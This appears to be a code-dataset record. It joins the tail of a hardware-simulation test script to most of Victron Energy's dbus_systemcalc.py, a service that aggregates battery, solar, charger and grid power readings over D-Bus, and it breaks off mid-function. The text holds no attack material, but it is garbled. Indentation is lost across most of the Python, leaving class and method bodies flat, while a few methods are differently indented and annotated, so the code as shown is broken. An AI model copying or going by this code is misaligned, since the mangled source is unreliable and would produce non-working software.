            self.inst(BasicRndSeq, seq_o='usr_pkt', intfs={'seq_o' : tlm(eth_usr_pkt).master})
            # Elaborate both 'rtl' and 'tlm'; the scoreboard checks that
            # the two produce identical byte streams.
            self.inst(Eth1GMac,
                      clk='clk',
                      pkt_in='usr_pkt',
                      pkt_out='gmii_pkt',
                      arch=['rtl', 'tlm'],
                      scrbrd=(Scoreboard, {'intfs': {'dut_i': tlm(Array(bit8)), 'ref_i': tlm(Array(bit8))}})
                      )
    conf = {
        'sys.top' : TestDFF,
        'sys.extensions' : [VCDTracer, SimtimeProgress],
        'sys.sim.duration' : 15000
    }
    sim = Simulator(conf)
    sim.run()
| lgpl-2.1 |
victronenergy/dbus-systemcalc-py | dbus_systemcalc.py | 1 | 39685 | #!/usr/bin/python3 -u
# -*- coding: utf-8 -*-
from dbus.mainloop.glib import DBusGMainLoop
import dbus
import argparse
import sys
import os
import json
from itertools import chain
from gi.repository import GLib
# Victron packages
sys.path.insert(1, os.path.join(os.path.dirname(__file__), 'ext', 'velib_python'))
from vedbus import VeDbusService
from ve_utils import get_vrm_portal_id, exit_on_error
from dbusmonitor import DbusMonitor
from settingsdevice import SettingsDevice
from logger import setup_logging
import delegates
from sc_utils import safeadd as _safeadd, safemax as _safemax
softwareVersion = '2.74'
class SystemCalc:
STATE_IDLE = 0
STATE_CHARGING = 1
STATE_DISCHARGING = 2
BATSERVICE_DEFAULT = 'default'
BATSERVICE_NOBATTERY = 'nobattery'
def __init__(self):
# Why this dummy? Because DbusMonitor expects these values to be there, even though we don't
# need them. So just add some dummy data. This can go away when DbusMonitor is more generic.
dummy = {'code': None, 'whenToLog': 'configChange', 'accessLevel': None}
dbus_tree = {
'com.victronenergy.solarcharger': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Load/I': dummy,
'/FirmwareVersion': dummy},
'com.victronenergy.pvinverter': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Ac/L1/Power': dummy,
'/Ac/L2/Power': dummy,
'/Ac/L3/Power': dummy,
'/Position': dummy,
'/ProductId': dummy},
'com.victronenergy.battery': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/DeviceInstance': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/1/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Dc/0/Power': dummy,
'/Soc': dummy,
'/Sense/Current': dummy,
'/TimeToGo': dummy,
'/ConsumedAmphours': dummy,
'/ProductId': dummy,
'/CustomName': dummy},
'com.victronenergy.vebus' : {
'/Ac/ActiveIn/ActiveInput': dummy,
'/Ac/ActiveIn/L1/P': dummy,
'/Ac/ActiveIn/L2/P': dummy,
'/Ac/ActiveIn/L3/P': dummy,
'/Ac/Out/L1/P': dummy,
'/Ac/Out/L2/P': dummy,
'/Ac/Out/L3/P': dummy,
'/Connected': dummy,
'/ProductId': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Mode': dummy,
'/State': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Dc/0/Power': dummy,
'/Soc': dummy},
'com.victronenergy.charger': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Dc/1/Voltage': dummy,
'/Dc/1/Current': dummy,
'/Dc/2/Voltage': dummy,
'/Dc/2/Current': dummy},
'com.victronenergy.grid' : {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/ProductId' : dummy,
'/DeviceType' : dummy,
'/Ac/L1/Power': dummy,
'/Ac/L2/Power': dummy,
'/Ac/L3/Power': dummy},
'com.victronenergy.genset' : {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/ProductId' : dummy,
'/DeviceType' : dummy,
'/Ac/L1/Power': dummy,
'/Ac/L2/Power': dummy,
'/Ac/L3/Power': dummy,
'/StarterVoltage': dummy},
'com.victronenergy.settings' : {
'/Settings/SystemSetup/AcInput1' : dummy,
'/Settings/SystemSetup/AcInput2' : dummy,
'/Settings/CGwacs/RunWithoutGridMeter' : dummy,
'/Settings/System/TimeZone' : dummy},
'com.victronenergy.temperature': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy},
'com.victronenergy.inverter': {
'/Connected': dummy,
'/ProductName': dummy,
'/Mgmt/Connection': dummy,
'/Dc/0/Voltage': dummy,
'/Dc/0/Current': dummy,
'/Ac/Out/L1/P': dummy,
'/Ac/Out/L1/V': dummy,
'/Ac/Out/L1/I': dummy,
'/Yield/Power': dummy,
'/Soc': dummy,
}
}
self._modules = [
delegates.HubTypeSelect(),
delegates.VebusSocWriter(),
delegates.ServiceMapper(),
delegates.RelayState(),
delegates.BuzzerControl(),
delegates.LgCircuitBreakerDetect(),
delegates.Dvcc(self),
delegates.BatterySense(self),
delegates.BatterySettings(self),
delegates.SystemState(self),
delegates.BatteryLife(),
delegates.ScheduledCharging(),
delegates.SourceTimers(),
#delegates.BydCurrentSense(self),
delegates.BatteryData(),
delegates.Gps()]
for m in self._modules:
for service, paths in m.get_input():
s = dbus_tree.setdefault(service, {})
for path in paths:
s[path] = dummy
self._dbusmonitor = self._create_dbus_monitor(dbus_tree, valueChangedCallback=self._dbus_value_changed,
deviceAddedCallback=self._device_added, deviceRemovedCallback=self._device_removed)
# Connect to localsettings
supported_settings = {
'batteryservice': ['/Settings/SystemSetup/BatteryService', self.BATSERVICE_DEFAULT, 0, 0],
'hasdcsystem': ['/Settings/SystemSetup/HasDcSystem', 0, 0, 1],
'useacout': ['/Settings/SystemSetup/HasAcOutSystem', 1, 0, 1]}
for m in self._modules:
for setting in m.get_settings():
supported_settings[setting[0]] = list(setting[1:])
self._settings = self._create_settings(supported_settings, self._handlechangedsetting)
self._dbusservice = self._create_dbus_service()
for m in self._modules:
m.set_sources(self._dbusmonitor, self._settings, self._dbusservice)
# This path does nothing except respond with a PropertiesChanged so
# that round-trip time can be measured.
self._dbusservice.add_path('/Ping', value=None, writeable=True)
# At this moment, VRM portal ID is the MAC address of the CCGX. Anyhow, it should be string uniquely
# identifying the CCGX.
self._dbusservice.add_path('/Serial', value=get_vrm_portal_id())
self._dbusservice.add_path(
'/AvailableBatteryServices', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/AvailableBatteryMeasurements', value=None)
self._dbusservice.add_path(
'/AutoSelectedBatteryService', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/AutoSelectedBatteryMeasurement', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/ActiveBatteryService', value=None, gettextcallback=self._gettext)
self._dbusservice.add_path(
'/Dc/Battery/BatteryService', value=None)
self._dbusservice.add_path(
'/PvInvertersProductIds', value=None)
self._summeditems = {
'/Ac/Grid/L1/Power': {'gettext': '%.0F W'},
'/Ac/Grid/L2/Power': {'gettext': '%.0F W'},
'/Ac/Grid/L3/Power': {'gettext': '%.0F W'},
'/Ac/Grid/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/Grid/ProductId': {'gettext': '%s'},
'/Ac/Grid/DeviceType': {'gettext': '%s'},
'/Ac/Genset/L1/Power': {'gettext': '%.0F W'},
'/Ac/Genset/L2/Power': {'gettext': '%.0F W'},
'/Ac/Genset/L3/Power': {'gettext': '%.0F W'},
'/Ac/Genset/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/Genset/ProductId': {'gettext': '%s'},
'/Ac/Genset/DeviceType': {'gettext': '%s'},
'/Ac/ConsumptionOnOutput/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnOutput/L1/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnOutput/L2/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnOutput/L3/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/L1/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/L2/Power': {'gettext': '%.0F W'},
'/Ac/ConsumptionOnInput/L3/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/Consumption/L1/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/L2/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/L3/Power': {'gettext': '%.0F W'},
'/Ac/Consumption/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/L1/Power': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/L2/Power': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/L3/Power': {'gettext': '%.0F W'},
'/Ac/PvOnOutput/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/L1/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/L2/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/L3/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGrid/NumberOfPhases': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/L1/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/L2/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/L3/Power': {'gettext': '%.0F W'},
'/Ac/PvOnGenset/NumberOfPhases': {'gettext': '%d'},
'/Dc/Pv/Power': {'gettext': '%.0F W'},
'/Dc/Pv/Current': {'gettext': '%.1F A'},
'/Dc/Battery/Voltage': {'gettext': '%.2F V'},
'/Dc/Battery/VoltageService': {'gettext': '%s'},
'/Dc/Battery/Current': {'gettext': '%.1F A'},
'/Dc/Battery/Power': {'gettext': '%.0F W'},
'/Dc/Battery/Soc': {'gettext': '%.0F %%'},
'/Dc/Battery/State': {'gettext': '%s'},
'/Dc/Battery/TimeToGo': {'gettext': '%.0F s'},
'/Dc/Battery/ConsumedAmphours': {'gettext': '%.1F Ah'},
'/Dc/Battery/ProductId': {'gettext': '0x%x'},
'/Dc/Charger/Power': {'gettext': '%.0F %%'},
'/Dc/Vebus/Current': {'gettext': '%.1F A'},
'/Dc/Vebus/Power': {'gettext': '%.0F W'},
'/Dc/System/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/Source': {'gettext': '%s'},
'/Ac/ActiveIn/L1/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/L2/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/L3/Power': {'gettext': '%.0F W'},
'/Ac/ActiveIn/NumberOfPhases': {'gettext': '%d'},
'/VebusService': {'gettext': '%s'}
}
for m in self._modules:
self._summeditems.update(m.get_output())
for path in self._summeditems.keys():
self._dbusservice.add_path(path, value=None, gettextcallback=self._gettext)
self._batteryservice = None
self._determinebatteryservice()
if self._batteryservice is None:
logger.info("Battery service initialized to None (setting == %s)" %
self._settings['batteryservice'])
self._changed = True
for service, instance in self._dbusmonitor.get_service_list().items():
self._device_added(service, instance, do_service_change=False)
self._handleservicechange()
self._updatevalues()
GLib.timeout_add(1000, exit_on_error, self._handletimertick)
def _create_dbus_monitor(self, *args, **kwargs):
raise Exception("This function should be overridden")
def _create_settings(self, *args, **kwargs):
raise Exception("This function should be overridden")
def _create_dbus_service(self):
raise Exception("This function should be overridden")
	def _handlechangedsetting(self, setting, oldvalue, newvalue):
		""" Callback from SettingsDevice for a localsettings change:
		re-evaluate the active battery service, flag the summary values
		for recalculation and forward the change to all delegates. """
		self._determinebatteryservice()
		self._changed = True
		# Give our delegates a chance to react on a settings change
		for m in self._modules:
			m.settings_changed(setting, oldvalue, newvalue)
def _find_device_instance(self, serviceclass, instance):
""" Gets a mapping of services vs DeviceInstance using
get_service_list. Then searches for the specified DeviceInstance
and returns the service name. """
services = self._dbusmonitor.get_service_list(classfilter=serviceclass)
for k, v in services.items():
if v == instance:
return k
return None
def _determinebatteryservice(self):
    """(Re)select which D-Bus service acts as the battery monitor.

    Publishes /AutoSelectedBatteryMeasurement and
    /AutoSelectedBatteryService, and — only when the selection actually
    changed — /ActiveBatteryService and /Dc/Battery/BatteryService,
    notifying the delegate modules of the change.
    """
    auto_battery_service = self._autoselect_battery_service()
    auto_battery_measurement = None
    if auto_battery_service is not None:
        services = self._dbusmonitor.get_service_list()
        if auto_battery_service in services:
            # Measurement key: '<class>/<instance>' with separators
            # flattened to underscores, eg 'com_victronenergy_battery_245/Dc/0'.
            auto_battery_measurement = \
                self._get_instance_service_name(auto_battery_service, services[auto_battery_service])
            auto_battery_measurement = auto_battery_measurement.replace('.', '_').replace('/', '_') + '/Dc/0'
    self._dbusservice['/AutoSelectedBatteryMeasurement'] = auto_battery_measurement

    if self._settings['batteryservice'] == self.BATSERVICE_DEFAULT:
        # Automatic mode: use whatever _autoselect_battery_service picked.
        newbatteryservice = auto_battery_service
        self._dbusservice['/AutoSelectedBatteryService'] = (
            'No battery monitor found' if newbatteryservice is None else
            self._get_readable_service_name(newbatteryservice))
    elif self._settings['batteryservice'] == self.BATSERVICE_NOBATTERY:
        # User explicitly selected "no battery monitor".
        self._dbusservice['/AutoSelectedBatteryService'] = None
        newbatteryservice = None
    else:
        # Explicit user choice, stored as '<serviceclass>/<instance>'.
        self._dbusservice['/AutoSelectedBatteryService'] = None
        s = self._settings['batteryservice'].split('/')
        if len(s) != 2:
            # NOTE(review): an invalid setting is only logged; the code then
            # continues with instance=None below — confirm this is intended.
            logger.error("The battery setting (%s) is invalid!" % self._settings['batteryservice'])
        serviceclass = s[0]
        instance = int(s[1]) if len(s) == 2 else None
        # newbatteryservice might turn into None if a chosen battery
        # monitor no longer exists. Don't auto change the setting (it might
        # come back) and don't autoselect another.
        newbatteryservice = self._find_device_instance(serviceclass, instance)

    if newbatteryservice != self._batteryservice:
        services = self._dbusmonitor.get_service_list()
        instance = services.get(newbatteryservice, None)
        if instance is None:
            battery_service = None
        else:
            battery_service = self._get_instance_service_name(newbatteryservice, instance)
        self._dbusservice['/ActiveBatteryService'] = battery_service
        logger.info("Battery service, setting == %s, changed from %s to %s (%s)" %
            (self._settings['batteryservice'], self._batteryservice, newbatteryservice, instance))
        # Battery service has changed. Notify delegates.
        for m in self._modules:
            m.battery_service_changed(self._batteryservice, newbatteryservice)
        self._dbusservice['/Dc/Battery/BatteryService'] = self._batteryservice = newbatteryservice
def _autoselect_battery_service(self):
# Default setting business logic:
# first try to use a battery service (BMV or Lynx Shunt VE.Can). If there
# is more than one battery service, just use a random one. If no battery service is
# available, check if there are not Solar chargers and no normal chargers. If they are not
# there, assume this is a hub-2, hub-3 or hub-4 system and use VE.Bus SOC.
batteries = self._get_connected_service_list('com.victronenergy.battery')
# Pick the first battery service
if len(batteries) > 0:
return sorted(batteries)[0]
# No battery services, and there is a charger in the system. Abandon
# hope.
if self._get_first_connected_service('com.victronenergy.charger') is not None:
return None
# Also no Multi, then give up.
vebus_service = self._get_service_having_lowest_instance('com.victronenergy.vebus')
if vebus_service is None:
# No VE.Bus, but maybe there is an inverter with built-in SOC
# tracking, eg RS Smart.
inverter = self._get_service_having_lowest_instance('com.victronenergy.inverter')
if inverter and self._dbusmonitor.get_value(inverter[0], '/Soc') is not None:
return inverter[0]
return None
# There is a Multi, and it supports tracking external charge current
# from solarchargers. Then use it.
if self._dbusmonitor.get_value(vebus_service[0], '/ExtraBatteryCurrent') is not None and self._settings['hasdcsystem'] == 0:
return vebus_service[0]
# Multi does not support tracking solarcharger current, and we have
# solar chargers. Then we cannot use it.
if self._get_first_connected_service('com.victronenergy.solarcharger') is not None:
return None
# Only a Multi, no other chargers. Then we can use it.
return vebus_service[0]
@property
def batteryservice(self):
    # D-Bus service name currently used as battery monitor, or None when
    # no battery monitor is active.
    return self._batteryservice
# Called on a one second timer
def _handletimertick(self):
if self._changed:
self._updatevalues()
self._changed = False
return True # keep timer running
def _updatepvinverterspidlist(self):
# Create list of connected pv inverters id's
pvinverters = self._dbusmonitor.get_service_list('com.victronenergy.pvinverter')
productids = []
for pvinverter in pvinverters:
pid = self._dbusmonitor.get_value(pvinverter, '/ProductId')
if pid is not None and pid not in productids:
productids.append(pid)
self._dbusservice['/PvInvertersProductIds'] = productids
def _updatevalues(self):
    """Recompute all summed/derived values and publish them on D-Bus.

    Walks the monitored services (PV inverters, solar chargers, chargers,
    VE.Direct inverters, VE.Bus devices and the selected battery monitor),
    derives the aggregate paths listed in self._summeditems, hands the
    result to the delegate modules, and finally writes every summed path
    to self._dbusservice (missing values are written as None so stale
    readings are invalidated).
    """
    # ==== PREPARATIONS ====
    newvalues = {}

    # Set the user timezone
    if 'TZ' not in os.environ:
        tz = self._dbusmonitor.get_value('com.victronenergy.settings', '/Settings/System/TimeZone')
        if tz is not None:
            os.environ['TZ'] = tz

    # Determine values used in logic below: total DC power of all multis.
    vebusses = self._dbusmonitor.get_service_list('com.victronenergy.vebus')
    vebuspower = 0
    for vebus in vebusses:
        v = self._dbusmonitor.get_value(vebus, '/Dc/0/Voltage')
        i = self._dbusmonitor.get_value(vebus, '/Dc/0/Current')
        if v is not None and i is not None:
            vebuspower += v * i

    # ==== PVINVERTERS ====
    pvinverters = self._dbusmonitor.get_service_list('com.victronenergy.pvinverter')
    # /Position value -> aggregate path prefix
    pos = {0: '/Ac/PvOnGrid', 1: '/Ac/PvOnOutput', 2: '/Ac/PvOnGenset'}
    for pvinverter in pvinverters:
        # Position will be None if PV inverter service has just been removed (after retrieving the
        # service list).
        position = pos.get(self._dbusmonitor.get_value(pvinverter, '/Position'))
        if position is not None:
            for phase in range(1, 4):
                power = self._dbusmonitor.get_value(pvinverter, '/Ac/L%s/Power' % phase)
                if power is not None:
                    path = '%s/L%s/Power' % (position, phase)
                    newvalues[path] = _safeadd(newvalues.get(path), power)

    for path in pos.values():
        self._compute_number_of_phases(path, newvalues)

    # ==== SOLARCHARGERS ====
    solarchargers = self._dbusmonitor.get_service_list('com.victronenergy.solarcharger')
    solarcharger_batteryvoltage = None
    solarcharger_batteryvoltage_service = None
    solarchargers_charge_power = 0
    solarchargers_loadoutput_power = None
    for solarcharger in solarchargers:
        v = self._dbusmonitor.get_value(solarcharger, '/Dc/0/Voltage')
        if v is None:
            continue
        i = self._dbusmonitor.get_value(solarcharger, '/Dc/0/Current')
        if i is None:
            continue
        # l: load-output current; defaults to 0 for chargers without one.
        l = self._dbusmonitor.get_value(solarcharger, '/Load/I', 0)
        if l is not None:
            if solarchargers_loadoutput_power is None:
                solarchargers_loadoutput_power = l * v
            else:
                solarchargers_loadoutput_power += l * v
        solarchargers_charge_power += v * i

        # Note that this path is not in the _summeditems{}, making for it to not be
        # published on D-Bus. Which is fine. The only one needing it is the vebussocwriter-
        # delegate.
        if '/Dc/Pv/ChargeCurrent' not in newvalues:
            newvalues['/Dc/Pv/ChargeCurrent'] = i
        else:
            newvalues['/Dc/Pv/ChargeCurrent'] += i

        if '/Dc/Pv/Power' not in newvalues:
            newvalues['/Dc/Pv/Power'] = v * _safeadd(i, l)
            newvalues['/Dc/Pv/Current'] = _safeadd(i, l)
            # Remember the first solarcharger with a valid reading as a
            # battery-voltage fallback source (used further down).
            solarcharger_batteryvoltage = v
            solarcharger_batteryvoltage_service = solarcharger
        else:
            newvalues['/Dc/Pv/Power'] += v * _safeadd(i, l)
            newvalues['/Dc/Pv/Current'] += _safeadd(i, l)

    # ==== CHARGERS ====
    chargers = self._dbusmonitor.get_service_list('com.victronenergy.charger')
    charger_batteryvoltage = None
    charger_batteryvoltage_service = None
    for charger in chargers:
        # Assume the battery connected to output 0 is the main battery
        v = self._dbusmonitor.get_value(charger, '/Dc/0/Voltage')
        if v is None:
            continue

        charger_batteryvoltage = v
        charger_batteryvoltage_service = charger

        i = self._dbusmonitor.get_value(charger, '/Dc/0/Current')
        if i is None:
            continue

        if '/Dc/Charger/Power' not in newvalues:
            newvalues['/Dc/Charger/Power'] = v * i
        else:
            newvalues['/Dc/Charger/Power'] += v * i

    # ==== VE.Direct Inverters ====
    # Sort by device instance so the lowest instance is the primary one.
    _vedirect_inverters = sorted((di, s) for s, di in self._dbusmonitor.get_service_list('com.victronenergy.inverter').items())
    vedirect_inverters = [x[1] for x in _vedirect_inverters]
    vedirect_inverter = None
    if vedirect_inverters:
        vedirect_inverter = vedirect_inverters[0]

    # For RS Smart inverters, add PV to the yield
    for i in vedirect_inverters:
        pv_yield = self._dbusmonitor.get_value(i, "/Yield/Power")
        if pv_yield is not None:
            newvalues['/Dc/Pv/Power'] = newvalues.get('/Dc/Pv/Power', 0) + pv_yield

    # ==== BATTERY ====
    if self._batteryservice is not None:
        batteryservicetype = self._batteryservice.split('.')[2]
        assert batteryservicetype in ('battery', 'vebus', 'inverter')

        newvalues['/Dc/Battery/Soc'] = self._dbusmonitor.get_value(self._batteryservice,'/Soc')
        newvalues['/Dc/Battery/TimeToGo'] = self._dbusmonitor.get_value(self._batteryservice,'/TimeToGo')
        newvalues['/Dc/Battery/ConsumedAmphours'] = self._dbusmonitor.get_value(self._batteryservice,'/ConsumedAmphours')
        newvalues['/Dc/Battery/ProductId'] = self._dbusmonitor.get_value(self._batteryservice, '/ProductId')

        if batteryservicetype in ('battery', 'inverter'):
            # Dedicated monitor (or SOC-tracking inverter): trust its values.
            newvalues['/Dc/Battery/Voltage'] = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Voltage')
            newvalues['/Dc/Battery/VoltageService'] = self._batteryservice
            newvalues['/Dc/Battery/Current'] = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Current')
            newvalues['/Dc/Battery/Power'] = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Power')
        elif batteryservicetype == 'vebus':
            vebus_voltage = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Voltage')
            vebus_current = self._dbusmonitor.get_value(self._batteryservice, '/Dc/0/Current')
            vebus_power = None if vebus_voltage is None or vebus_current is None else vebus_current * vebus_voltage
            newvalues['/Dc/Battery/Voltage'] = vebus_voltage
            newvalues['/Dc/Battery/VoltageService'] = self._batteryservice
            if self._settings['hasdcsystem'] == 1:
                # hasdcsystem will normally disqualify the multi from being
                # auto-selected as battery monitor, so the only way we're
                # here is if the user explicitly selected the multi as the
                # battery service
                newvalues['/Dc/Battery/Current'] = vebus_current
                if vebus_power is not None:
                    newvalues['/Dc/Battery/Power'] = vebus_power
            else:
                # No DC system: battery power = multi DC power + solarcharger power.
                battery_power = _safeadd(solarchargers_charge_power, vebus_power)
                newvalues['/Dc/Battery/Current'] = battery_power / vebus_voltage if vebus_voltage is not None and vebus_voltage > 0 else None
                newvalues['/Dc/Battery/Power'] = battery_power

        # Derive a coarse charging state from the battery power, with a
        # +/-30 W dead band around idle.
        p = newvalues.get('/Dc/Battery/Power', None)
        if p is not None:
            if p > 30:
                newvalues['/Dc/Battery/State'] = self.STATE_CHARGING
            elif p < -30:
                newvalues['/Dc/Battery/State'] = self.STATE_DISCHARGING
            else:
                newvalues['/Dc/Battery/State'] = self.STATE_IDLE
    else:
        # The battery service is not a BMS/BMV or a suitable vebus. A
        # suitable vebus is defined as one explicitly selected by the user,
        # or one that was automatically selected for SOC tracking. We may
        # however still have a VE.Bus, just not one that can accurately
        # track SOC. If we have one, use it as voltage source. Otherwise
        # try a solar charger, a charger, or a vedirect inverter as
        # fallbacks.
        batteryservicetype = None
        vebusses = self._dbusmonitor.get_service_list('com.victronenergy.vebus')
        for vebus in vebusses:
            v = self._dbusmonitor.get_value(vebus, '/Dc/0/Voltage')
            s = self._dbusmonitor.get_value(vebus, '/State')
            if v is not None and s not in (0, None):
                newvalues['/Dc/Battery/Voltage'] = v
                newvalues['/Dc/Battery/VoltageService'] = vebus
                break # Skip the else below
        else:
            # No suitable vebus voltage, try other devices
            if solarcharger_batteryvoltage is not None:
                newvalues['/Dc/Battery/Voltage'] = solarcharger_batteryvoltage
                newvalues['/Dc/Battery/VoltageService'] = solarcharger_batteryvoltage_service
            elif charger_batteryvoltage is not None:
                newvalues['/Dc/Battery/Voltage'] = charger_batteryvoltage
                newvalues['/Dc/Battery/VoltageService'] = charger_batteryvoltage_service
            elif vedirect_inverter is not None:
                v = self._dbusmonitor.get_value(vedirect_inverter, '/Dc/0/Voltage')
                if v is not None:
                    newvalues['/Dc/Battery/Voltage'] = v
                    newvalues['/Dc/Battery/VoltageService'] = vedirect_inverter

        if self._settings['hasdcsystem'] == 0 and '/Dc/Battery/Voltage' in newvalues:
            # No unmonitored DC loads or chargers, and also no battery monitor: derive battery watts
            # and amps from vebus, solarchargers and chargers.
            assert '/Dc/Battery/Power' not in newvalues
            assert '/Dc/Battery/Current' not in newvalues
            p = solarchargers_charge_power + newvalues.get('/Dc/Charger/Power', 0) + vebuspower
            voltage = newvalues['/Dc/Battery/Voltage']
            newvalues['/Dc/Battery/Current'] = p / voltage if voltage > 0 else None
            newvalues['/Dc/Battery/Power'] = p

    # ==== SYSTEM POWER ====
    if self._settings['hasdcsystem'] == 1 and batteryservicetype == 'battery':
        # Calculate power being generated/consumed by not measured devices in the network.
        # For MPPTs, take all the power, including power going out of the load output.
        # /Dc/System: positive: consuming power
        # VE.Bus: Positive: current flowing from the Multi to the dc system or battery
        # Solarcharger & other chargers: positive: charging
        # battery: Positive: charging battery.
        # battery = solarcharger + charger + ve.bus - system
        battery_power = newvalues.get('/Dc/Battery/Power')
        if battery_power is not None:
            dc_pv_power = newvalues.get('/Dc/Pv/Power', 0)
            charger_power = newvalues.get('/Dc/Charger/Power', 0)

            # If there are VE.Direct inverters, remove their power from the
            # DC estimate. This is done using the AC value when the DC
            # power values are not available.
            inverter_power = 0
            for i in vedirect_inverters:
                inverter_current = self._dbusmonitor.get_value(i, '/Dc/0/Current')
                if inverter_current is not None:
                    inverter_power += self._dbusmonitor.get_value(
                        i, '/Dc/0/Voltage', 0) * inverter_current
                else:
                    inverter_power += self._dbusmonitor.get_value(
                        i, '/Ac/Out/L1/V', 0) * self._dbusmonitor.get_value(
                        i, '/Ac/Out/L1/I', 0)
            newvalues['/Dc/System/Power'] = dc_pv_power + charger_power + vebuspower - inverter_power - battery_power
    elif self._settings['hasdcsystem'] == 1 and solarchargers_loadoutput_power is not None:
        # Best effort: at least report the MPPT load-output power.
        newvalues['/Dc/System/Power'] = solarchargers_loadoutput_power

    # ==== Vebus ====
    multi = self._get_service_having_lowest_instance('com.victronenergy.vebus')
    multi_path = None
    if multi is not None:
        multi_path = multi[0]
        dc_current = self._dbusmonitor.get_value(multi_path, '/Dc/0/Current')
        newvalues['/Dc/Vebus/Current'] = dc_current
        dc_power = self._dbusmonitor.get_value(multi_path, '/Dc/0/Power')
        # Just in case /Dc/0/Power is not available
        # NOTE(review): '== None' should be 'is None'; left unchanged here.
        if dc_power == None and dc_current is not None:
            dc_voltage = self._dbusmonitor.get_value(multi_path, '/Dc/0/Voltage')
            if dc_voltage is not None:
                dc_power = dc_voltage * dc_current
        # Note that there is also vebuspower, which is the total DC power summed over all multis.
        # However, this value cannot be combined with /Dc/Multi/Current, because it does not make sense
        # to add the Dc currents of all multis if they do not share the same DC voltage.
        newvalues['/Dc/Vebus/Power'] = dc_power

    newvalues['/VebusService'] = multi_path

    # ===== AC IN SOURCE =====
    ac_in_source = None
    if multi_path is None:
        # Check if we have an non-VE.Bus inverter. If yes, then ActiveInput
        # is disconnected.
        if vedirect_inverter is not None:
            ac_in_source = 240
    else:
        active_input = self._dbusmonitor.get_value(multi_path, '/Ac/ActiveIn/ActiveInput')
        if active_input == 0xF0:
            # Not connected
            ac_in_source = 240
        elif active_input is not None:
            settings_path = '/Settings/SystemSetup/AcInput%s' % (active_input + 1)
            ac_in_source = self._dbusmonitor.get_value('com.victronenergy.settings', settings_path)
    newvalues['/Ac/ActiveIn/Source'] = ac_in_source

    # ===== GRID METERS & CONSUMPTION ====
    grid_meter = self._get_first_connected_service('com.victronenergy.grid')
    genset_meter = self._get_first_connected_service('com.victronenergy.genset')

    # Make an educated guess as to what is being consumed from an AC source. If ac_in_source
    # indicates grid, genset or shore, we use that. If the Multi is off, or disconnected through
    # a relay assistant or otherwise, then assume the presence of a .grid or .genset service indicates
    # presence of that AC source. If both are available, then give up. This decision making is here
    # so the GUI has something to present even if the Multi is off.
    ac_in_guess = ac_in_source
    if ac_in_guess in (None, 0xF0):
        if genset_meter is None and grid_meter is not None:
            ac_in_guess = 1
        elif grid_meter is None and genset_meter is not None:
            ac_in_guess = 2

    consumption = { "L1" : None, "L2" : None, "L3" : None }
    for device_type, em_service, _types in (('Grid', grid_meter, (1, 3)), ('Genset', genset_meter, (2,))):
        # If a grid meter is present we use values from it. If not, we look at the multi. If it has
        # AcIn1 or AcIn2 connected to the grid, we use those values.
        # com.victronenergy.grid.??? indicates presence of an energy meter used as grid meter.
        # com.victronenergy.vebus.???/Ac/ActiveIn/ActiveInput: decides which whether we look at AcIn1
        # or AcIn2 as possible grid connection.
        uses_active_input = ac_in_source in _types
        for phase in consumption:
            p = None
            pvpower = newvalues.get('/Ac/PvOn%s/%s/Power' % (device_type, phase))
            if em_service is not None:
                p = self._dbusmonitor.get_value(em_service, '/Ac/%s/Power' % phase)
                # Compute consumption between energy meter and multi (meter power - multi AC in) and
                # add an optional PV inverter on input to the mix.
                c = None
                if uses_active_input:
                    ac_in = self._dbusmonitor.get_value(multi_path, '/Ac/ActiveIn/%s/P' % phase)
                    if ac_in is not None:
                        c = _safeadd(c, -ac_in)
                # If there's any power coming from a PV inverter in the inactive AC in (which is unlikely),
                # it will still be used, because there may also be a load in the same ACIn consuming
                # power, or the power could be fed back to the net.
                c = _safeadd(c, p, pvpower)
                consumption[phase] = _safeadd(consumption[phase], _safemax(0, c))
            else:
                if uses_active_input:
